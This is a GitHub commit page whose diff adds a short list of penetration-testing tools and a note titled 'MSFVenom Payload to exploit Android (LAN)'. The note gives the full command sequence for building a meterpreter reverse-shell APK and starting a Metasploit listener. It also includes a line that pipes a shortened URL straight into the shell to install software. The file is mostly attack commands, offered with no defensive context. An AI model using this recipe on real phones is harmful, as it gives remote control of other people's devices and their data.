Skip to content

Commit

Permalink
Update
Browse files Browse the repository at this point in the history
  • Loading branch information
itspatkar committed Jul 23, 2024
1 parent 676a612 commit d0d1db6
Show file tree
Hide file tree
Showing 12 changed files with 31 additions and 369 deletions.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
8 changes: 8 additions & 0 deletions Assets/cysec.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
# Cyber Security Tools

- gobuster : Gobuster is a tool used in penetration testing and cybersecurity assessments. It's primarily designed for discovering web content, directories, and files on web servers.
- pdfinfo : Portable Document Format (PDF) document information extractor (poppler-utils)
- exiftool : ExifTool is used to read and write metadata in various file types, such as JPEG images.
- sqlmap : SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities in web applications.
- crunch : Crunch command generates wordlists based on specified character sets, minimum and maximum lengths, and specific patterns. These wordlists can be used for dictionary attacks.
- jSQL :
File renamed without changes.
23 changes: 23 additions & 0 deletions Assets/termux-metasploit-payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
# MSFVenom Payload to exploit Android (LAN)

# Install Metasploit Framework in Termux
source <(curl -fsSL https://kutt.it/msf)

# Create MSFVenom Payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=<localhost_ip_receive> LPORT=<localhost_port_listen> R app_name.apk

# Start Metasploit Console
msfconsole

# Set Listener on Metasploit
use exploit/multi/handler

# Set Reverse Payload
set payload android/meterpreter/reverse_tcp

# Set localhost IP to receive and port to listen connections
set LHOST=<Receive_IP>
LPORT=<Receive_Port>

# Start the listener
run / exploit
File renamed without changes.
9 changes: 0 additions & 9 deletions BAK/assets/script.js

This file was deleted.

139 changes: 0 additions & 139 deletions BAK/assets/style.css

This file was deleted.

Loading

0 comments on commit d0d1db6

Please sign in to comment.